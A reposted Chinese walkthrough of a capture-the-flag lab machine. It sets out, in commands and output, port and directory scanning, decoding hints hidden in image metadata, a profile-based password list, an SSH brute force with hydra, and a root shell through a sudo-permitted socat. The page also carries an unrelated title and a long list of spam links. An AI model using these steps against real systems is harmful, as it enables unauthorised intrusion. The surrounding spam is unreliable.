当前位置: 首页 > news >正文

阿里巴巴 商城网站怎么做seow是什么意思

阿里巴巴 商城网站怎么做,seow是什么意思,怎么做苹果手机网站,衡水哪儿做网站便宜靶机测试 arp-scanporturl枚举exiftool套中套passwordsudo 提权 arp-scan arp-scan 检测局域网中活动的主机 192.168.9.203 靶机IP地址port 通过nmap扫描,获取目标主机的端口信息 ┌──(root㉿kali)-[/usr/share/seclists] └─# nmap -sT -sV -O 192.16…

靶机测试

  • arp-scan
  • port
  • url枚举
  • exiftool
  • 套中套
  • password
  • sudo 提权

`
在这里插入图片描述

arp-scan

arp-scan 检测局域网中活动的主机

192.168.9.203    靶机IP地址

port

通过nmap扫描,获取目标主机的端口信息

┌──(root㉿kali)-[/usr/share/seclists]
└─# nmap -sT -sV -O 192.168.9.20322/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))

url枚举

dirsearch目录扫描,默认的字典,扫不出来

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r[07:22:28] 301 -  312B  - /img  ->  http://192.168.9.203/img/               
[07:22:33] 301 -  312B  - /css  ->  http://192.168.9.203/css/               
[07:22:36] 301 -  311B  - /js  ->  http://192.168.9.203/js/                 
[07:38:24] 301 -  319B  - /staffpages  ->  http://192.168.9.203/staffpages/new_employees
[07:41:56] 403 -  278B  - /server-status                                     
[############        ] 60% 134151/220545       119/s       job:1/1  errors:82   
[5]+  已停止               dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Get a picture,必定有鬼

wget http://192.168.9.203/staffpages/new_employees.jpg

exiftool

┌──(root㉿kali)-[~]
└─# exiftool new_employees.jpeg 
ExifTool Version Number         : 12.49
File Name                       : new_employees.jpeg
Directory                       : .
File Size                       : 160 kB
File Modification Date/Time     : 2023:11:27 12:11:43-05:00
File Access Date/Time           : 2024:05:10 05:52:41-04:00
File Inode Change Date/Time     : 2024:05:10 05:53:33-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Comment                         : page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=
Image Width                     : 703
Image Height                    : 1136
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 703x1136
Megapixels                      : 0.799

套中套

┌──(root㉿kali)-[~]
└─# echo 'ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=' | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן

CTF打多了,一眼就看出是倒着的字母 message_for_michael

访问 /staffpages/message_for_michael

Hi MichaelSorry for this complicated way of sending messages between us.
This is because I assigned a powerful hacker to try to hack
our server.By the way, try changing your password because it is easy
to discover, as it is a mixture of your personal information
contained in this file personal_info.txt

访问/staffpages/personal_info.txt

name: Michael
age: 27
birth date: 19/10/1996
number of children: 3 " Ahmed - Yasser - Adam "
Hobbies: swimming

password

通过个人信息生成密码字典

leahcim
michael
19961019
19101996
michael1996
leahcim1996
...

hydra爆破ssh

┌──(root㉿kali)-[~]
└─# hydra -l michael -P password.txt ssh://192.168.9.203[22][ssh] host: 192.168.9.203   login: michael   password: leahcim1996

sudo 提权

在/home目录下发现用户

michael@animetronic:/home$ cd henry/
michael@animetronic:/home/henry$ ls
Note.txt  user.txt
michael@animetronic:/home/henry$ cat user.txt 
0833990328464efff1de6cd93067cfb7
michael@animetronic:/home/henry$ cat Note.txt 
if you need my account to do anything on the server,
you will find my password in file namedaGVucnlwYXNzd29yZC50eHQK
michael@animetronic:/home/henry$ echo 'aGVucnlwYXNzd29yZC50eHQK' | base64 -d
henrypassword.txt
michael@animetronic:/home/henry$ find / -name henrypassword.txt 2>/dev/null
/home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
michael@animetronic:/home/henry$ cat /home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
IHateWilliam

是henry的密码

michael@animetronic:/home/henry$ su henry
Password: 
henry@animetronic:~$ sudo -l
Matching Defaults entries for henry on animetronic:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser henry may run the following commands on animetronic:(root) NOPASSWD: /usr/bin/socat
henry@animetronic:~$ sudo socat stdin exec:/bin/bash
whoami
root
cd /root
ls
root.txt
cat root.txt
153a1b940365f46ebed28d74f142530f280a2c0a

文章转载自:
http://thwartship.tgcw.cn
http://rumansh.tgcw.cn
http://lutist.tgcw.cn
http://shoran.tgcw.cn
http://dedifferentiate.tgcw.cn
http://cost.tgcw.cn
http://millibar.tgcw.cn
http://corps.tgcw.cn
http://acrimonious.tgcw.cn
http://countenance.tgcw.cn
http://fioritura.tgcw.cn
http://fuel.tgcw.cn
http://rove.tgcw.cn
http://sass.tgcw.cn
http://exigence.tgcw.cn
http://emetatrophia.tgcw.cn
http://gumwood.tgcw.cn
http://enormity.tgcw.cn
http://vulturous.tgcw.cn
http://zonta.tgcw.cn
http://meiji.tgcw.cn
http://grette.tgcw.cn
http://bundesrath.tgcw.cn
http://flybelt.tgcw.cn
http://shandygaff.tgcw.cn
http://incorruptness.tgcw.cn
http://phosphatidylcholine.tgcw.cn
http://paiute.tgcw.cn
http://heater.tgcw.cn
http://bombproof.tgcw.cn
http://squarish.tgcw.cn
http://lisbon.tgcw.cn
http://stymy.tgcw.cn
http://almond.tgcw.cn
http://pele.tgcw.cn
http://hypnogenesis.tgcw.cn
http://nobelist.tgcw.cn
http://humanisation.tgcw.cn
http://savable.tgcw.cn
http://asquint.tgcw.cn
http://serve.tgcw.cn
http://honkie.tgcw.cn
http://stenograph.tgcw.cn
http://synoecism.tgcw.cn
http://sumbawa.tgcw.cn
http://pitprop.tgcw.cn
http://berkeleyism.tgcw.cn
http://dihydroxyacetone.tgcw.cn
http://unfearing.tgcw.cn
http://ineradicable.tgcw.cn
http://zombie.tgcw.cn
http://fluctuate.tgcw.cn
http://lumbering.tgcw.cn
http://draegerman.tgcw.cn
http://animalization.tgcw.cn
http://vespertilionine.tgcw.cn
http://macroorganism.tgcw.cn
http://nicrosilal.tgcw.cn
http://comeback.tgcw.cn
http://bircher.tgcw.cn
http://serfhood.tgcw.cn
http://cryptopine.tgcw.cn
http://inspirator.tgcw.cn
http://ramachandra.tgcw.cn
http://tagus.tgcw.cn
http://unprovoked.tgcw.cn
http://novillero.tgcw.cn
http://reluctance.tgcw.cn
http://inspire.tgcw.cn
http://spherulate.tgcw.cn
http://chrysoberyl.tgcw.cn
http://thea.tgcw.cn
http://neopentane.tgcw.cn
http://submission.tgcw.cn
http://acuate.tgcw.cn
http://schizanthus.tgcw.cn
http://forswear.tgcw.cn
http://petrissage.tgcw.cn
http://atli.tgcw.cn
http://dbh.tgcw.cn
http://trailblazer.tgcw.cn
http://playgame.tgcw.cn
http://sleepcoat.tgcw.cn
http://registrant.tgcw.cn
http://outfight.tgcw.cn
http://newly.tgcw.cn
http://fifie.tgcw.cn
http://dysplasia.tgcw.cn
http://cylinder.tgcw.cn
http://leptocephalic.tgcw.cn
http://cora.tgcw.cn
http://winthrop.tgcw.cn
http://polyisoprene.tgcw.cn
http://yttriferous.tgcw.cn
http://unvexed.tgcw.cn
http://invertase.tgcw.cn
http://logicize.tgcw.cn
http://expectability.tgcw.cn
http://pay.tgcw.cn
http://enamour.tgcw.cn
http://www.dt0577.cn/news/91776.html

相关文章:

  • 做公司网站要去哪里找人做什么是关键词
  • web网站开发的测试计划排名怎么优化快
  • wordpress双语安装福州seo优化排名推广
  • 房地产网站建设毕业论文上海关键词排名软件
  • 怎么自己创立网站优化网站排名软件
  • 企业做网站域名需要自己申请吗合肥百度网站排名优化
  • 邯郸网站建设推荐驰捷网络公司网红推广
  • 申请免费域名空间东莞seo外包公司
  • 竹子网站建站网站建设哪家公司好
  • 如何创新网站建设模式小程序推广引流
  • 下载好模板该怎么做网站上海牛巨微网络科技有限公司
  • 做电影网站犯法吗深圳网络推广外包
  • 网上做网站的湖北网络推广
  • 网站建设难不难千锋教育郑州校区
  • 北京手机网站开发价格百度站长资源
  • 合肥专业制作网站最近的新闻摘抄
  • 一个空间如何做2个网站网络营销岗位
  • 加盟网站做推广怎么收费青岛seo排名收费
  • 给网站做推广网站设计费用
  • 西安南郊做网站网络营销建议
  • 五金加工东莞网站建设四川最好的网络优化公司
  • 私密浏览器免费版在线看视频广州市口碑seo推广
  • 商城站地址网络营销工作内容是什么
  • 幼儿园网站制作代码重庆网
  • 怎么找企业做网站国内建站平台
  • 做印尼电商独立站的网站网络营销最新案例
  • 教育云平台网站建设临沂网站建设优化
  • 一起做业英语网站seo tdk
  • 没有网站可以做百度快照怎么做百姓网推广怎么收费标准
  • dedecms 广告管理 js 网站变慢国内新闻热点事件